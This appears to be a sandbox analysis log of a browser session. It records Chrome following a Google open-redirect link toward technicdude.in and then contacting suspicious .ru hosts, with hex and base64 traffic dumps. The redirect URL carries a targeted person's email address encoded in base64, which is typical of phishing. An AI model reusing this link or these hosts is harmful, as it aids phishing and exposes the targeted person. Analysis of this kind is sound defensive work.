                                                                    2025-01-15 21:50:25 UTC1329INData Raw: 57 31 4a 51 6c 4a 46 72 6d 4a 68 5a 68 6c 46 54 56 32 65 4e 63 33 70 73 58 6e 6c 62 62 6c 31 6a 63 61 69 67 67 6d 75 6d 65 6f 4b 77 72 6d 56 71 62 34 70 70 74 59 75 70 68 33 65 51 76 6e 71 4b 69 73 4a 2b 6a 6e 65 7a 66 73 52 2f 75 5a 65 70 68 4d 4b 58 78 71 69 67 74 4d 72 41 74 62 69 50 75 72 62 4b 6c 4e 50 59 73 62 43 63 7a 4d 4b 36 35 65 48 43 76 37 48 6e 6f 37 79 39 33 4c 2f 47 75 72 72 48 7a 73 4c 4b 79 4c 66 35 79 37 6a 47 38 4d 37 64 38 2f 48 53 42 4f 44 32 2f 4f 48 56 34 51 44 4a 33 41 50 4a 33 65 59 41 43 66 45 50 43 65 62 70 34 67 7a 72 42 50 6a 31 46 42 58 77 47 41 4d 63 41 69 44 34 34 66 55 43 45 2b 67 74 4c 77 77 78 44 53 41 44 45 77 4c 7a 43 2f 50 31 41 76 63 33 2f 43 6c 41 43 53 6f 36 50 43 30 57 4d 68 49 36 46 54 4d 70 49 54 34 76 4b 6a 34
                                                                    Data Ascii: W1JQlJFrmJhZhlFTV2eNc3psXnlbbl1jcaiggmumeoKwrmVqb4pptYuph3eQvnqKisJ+jnezfsR/uZephMKXxqigtMrAtbiPurbKlNPYsbCczMK65eHCv7Hno7y93L/GurrHzsLKyLf5y7jG8M7d8/HSBOD2/OHV4QDJ3APJ3eYACfEPCebp4gzrBPj1FBXwGAMcAiD44fUCE+gtLwwxDSADEwLzC/P1Avc3/ClACSo6PC0WMhI6FTMpIT4vKj4
                                                                    2025-01-15 21:50:25 UTC1369INData Raw: 48 41 78 61 54 74 71 65 45 6b 35 62 31 31 41 64 56 31 61 58 55 4a 30 6a 47 78 48 69 55 56 6c 54 33 4e 78 52 70 56 6d 6b 47 78 56 68 46 6d 5a 57 56 42 75 6d 56 6d 4c 6b 33 6c 6a 6f 4a 79 48 70 33 35 70 69 57 75 44 72 47 64 70 63 62 53 75 6f 34 71 66 62 6e 61 6a 75 4b 70 39 6e 6f 71 66 65 5a 57 38 77 49 57 64 70 72 33 48 78 4c 2b 66 68 59 7a 49 77 64 47 2b 71 72 79 52 72 4d 2b 74 6c 6f 7a 51 78 4d 37 58 31 4e 62 52 6c 4e 53 77 35 74 4c 58 76 4b 6d 71 71 62 62 70 32 63 6d 34 38 75 79 2b 36 4f 58 77 31 73 58 31 79 72 58 75 2b 74 54 57 33 63 48 59 77 63 38 44 32 73 44 45 43 4f 44 68 33 2f 33 75 79 4f 30 50 35 68 48 6b 30 51 33 56 44 52 76 77 36 75 6a 61 43 2b 72 79 48 67 30 4e 47 43 62 39 46 66 49 6d 46 42 77 4b 48 79 76 2b 4a 79 34 65 45 76 4d 31 49 68 4d 48
                                                                    Data Ascii: HAxaTtqeEk5b11AdV1aXUJ0jGxHiUVlT3NxRpVmkGxVhFmZWVBumVmLk3ljoJyHp35piWuDrGdpcbSuo4qfbnajuKp9noqfeZW8wIWdpr3HxL+fhYzIwdG+qryRrM+tlozQxM7X1NbRlNSw5tLXvKmqqbbp2cm48uy+6OXw1sX1yrXu+tTW3cHYwc8D2sDECODh3/3uyO0P5hHk0Q3VDRvw6ujaC+ryHg0NGCb9FfImFBwKHyv+Jy4eEvM1IhMH
                                                                    2025-01-15 21:50:25 UTC1369INData Raw: 46 35 4f 57 74 66 57 46 4e 32 52 59 68 64 62 44 35 38 62 6c 31 36 67 6e 4a 74 6a 49 52 6c 69 6c 57 46 61 6f 2b 4f 69 58 70 58 66 6f 2b 69 6b 48 46 65 70 4a 36 47 58 33 65 70 70 6f 61 4e 65 4b 47 62 67 4b 36 6a 72 4c 4b 33 74 72 69 51 74 48 56 39 6b 37 52 34 66 35 64 39 76 72 47 43 68 36 5a 2f 75 37 79 6f 76 4b 58 41 7a 4d 4b 79 71 73 65 52 6b 63 79 70 6c 63 54 62 75 63 33 58 31 4e 50 65 75 4e 6a 62 6f 65 48 6e 73 4b 53 6f 71 62 6e 64 77 73 71 38 37 75 6e 4f 33 66 58 76 74 4e 54 34 79 73 62 6b 2f 50 53 78 30 77 4c 74 39 41 44 44 2f 65 4c 57 2b 74 37 42 33 67 72 4f 37 68 48 4b 35 75 6f 4b 46 74 51 4d 39 52 66 51 43 66 6e 64 32 64 6a 53 49 74 30 56 37 4f 51 64 4b 65 41 71 43 79 30 6a 4c 69 76 74 41 4f 77 76 4b 50 45 33 42 2f 45 70 39 42 45 54 44 50 55 53 4e
                                                                    Data Ascii: F5OWtfWFN2RYhdbD58bl16gnJtjIRlilWFao+OiXpXfo+ikHFepJ6GX3eppoaNeKGbgK6jrLK3triQtHV9k7R4f5d9vrGCh6Z/u7yovKXAzMKyqseRkcyplcTbuc3X1NPeuNjboeHnsKSoqbndwsq87unO3fXvtNT4ysbk/PSx0wLt9ADD/eLW+t7B3grO7hHK5uoKFtQM9RfQCfnd2djSIt0V7OQdKeAqCy0jLivtAOwvKPE3B/Ep9BETDPUSN
                                                                    2025-01-15 21:50:25 UTC557INData Raw: 33 57 58 6c 7a 68 48 74 2b 54 58 64 4c 67 6d 4e 79 69 31 42 56 64 55 70 52 57 57 71 53 57 56 70 2b 6c 71 46 55 70 48 5a 6b 6f 6e 32 46 5a 56 78 2b 66 57 32 43 6d 48 36 74 72 59 36 41 70 59 75 53 70 58 56 36 65 4a 68 36 6c 48 6d 79 66 33 53 38 74 6f 57 62 68 5a 2b 43 69 71 71 38 7a 72 72 50 70 34 32 39 79 4d 66 56 74 74 53 6c 31 72 47 36 70 4a 72 4b 6b 62 79 65 75 62 36 35 35 4f 4b 67 78 61 6e 55 77 72 6e 73 78 63 4c 45 38 63 4b 2b 37 75 4f 31 79 76 53 78 35 4e 62 4b 2b 72 43 35 79 66 47 30 31 76 61 39 77 51 6e 31 77 77 66 38 34 66 33 68 42 4f 54 4e 35 67 7a 66 45 75 59 4d 30 78 59 45 7a 63 34 50 46 52 6a 77 45 68 77 55 34 68 62 68 49 50 30 62 49 53 41 41 48 77 49 77 44 53 4d 54 4b 41 6b 7a 38 53 7a 32 4e 68 73 73 39 79 38 67 48 67 41 79 4c 45 51 58 4f 52
                                                                    Data Ascii: 3WXlzhHt+TXdLgmNyi1BVdUpRWWqSWVp+lqFUpHZkon2FZVx+fW2CmH6trY6ApYuSpXV6eJh6lHmyf3S8toWbhZ+Ciqq8zrrPp429yMfVttSl1rG6pJrKkbyeub655OKgxanUwrnsxcLE8cK+7uO1yvSx5NbK+rC5yfG01va9wQn1wwf84f3hBOTN5gzfEuYM0xYEzc4PFRjwEhwU4hbhIP0bISAAHwIwDSMTKAkz8Sz2Nhss9y8gHgAyLEQXOR


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.849752104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:25 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:26 UTC442INHTTP/1.1 400 Bad Request
                                                                    Date: Wed, 15 Jan 2025 21:50:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 14
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    cf-chl-out: 0baZA2WKl8ckzCVb7DJ3Kjbz4wS7PVzuTtMWDjnMmWqX97/b0NJrkE3Jlhvgs+wFdZO59BL5yd1g0rrYb/OKxg==$qhXKpUuCyGpwQ4neH1LX5Q==
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914d478b8c40c-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:26 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                    Data Ascii: {"err":100230}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.849754104.21.32.14434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:26 UTC670OUTGET /CFFosVVTLJhqYwRVAfbJpWevuDzUvXPUVQLIAETXJPRCVHPCKZOSKOZDRZWARFMODJEGAE HTTP/1.1
                                                                    Host: fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://r.bitualicar.ru
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:26 UTC904INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BKf9jH%2FfSJ54rgPtejxeFqIEvf8n61kM01m0%2B8E3ZacfbFdRh0oRDAoQF4%2FCOOqVE3%2BeTKCwg4VpbD%2Foya0n8Lq3oHLP1LOEVW2HBxz7aQFAXPFaAmKOwlA4EeEpTOOWCnIL6a6V2ODPHhceqjzzSvgFXcJQHAwx4vitsj7PzrfDFZQGxWn%2B9ZPTiDtPuSQoOJHC8cOlFUxYdY%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914d7b847c327-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1498&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1248&delivery_rate=1949265&cwnd=189&unsent_bytes=0&cid=090e1974a146ade4&ts=581&x=0"
                                                                    2025-01-15 21:50:26 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                    Data Ascii: 11
                                                                    2025-01-15 21:50:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.849758104.21.32.14434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:28 UTC466OUTGET /CFFosVVTLJhqYwRVAfbJpWevuDzUvXPUVQLIAETXJPRCVHPCKZOSKOZDRZWARFMODJEGAE HTTP/1.1
                                                                    Host: fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:28 UTC898INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZWFnFC7LHp5L63gBMf4IYyg79JUTkIVCWa4dl6hq8d0vNj1rHa6MTOXXqnlO78ZSiA6HLVgSBckQWSjlJyVwJSxxkEJ%2BvgcjmnBJgtBLN2iJktmkLJG44CzN43Jrn0Cf7Pl5Cl3KEgoVJYkvAea%2FbZbZjKYwO8S3%2BeNiemtNcaJx0QPSkf6r7zeA8JhJwY%2Fx2KbWFQIqolQTAY%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914e2ad1b41a6-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1594&rtt_var=683&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1044&delivery_rate=1831869&cwnd=242&unsent_bytes=0&cid=96e795c4a5146256&ts=740&x=0"
                                                                    2025-01-15 21:50:28 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                    Data Ascii: 11
                                                                    2025-01-15 21:50:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:16:49:55
                                                                    Start date:15/01/2025
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                    Imagebase:0x7ff678760000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:16:49:59
                                                                    Start date:15/01/2025
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1908,i,13844692018575917634,11113363890473610218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff678760000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:16:50:05
                                                                    Start date:15/01/2025
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ=="
                                                                    Imagebase:0x7ff678760000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    No disassembly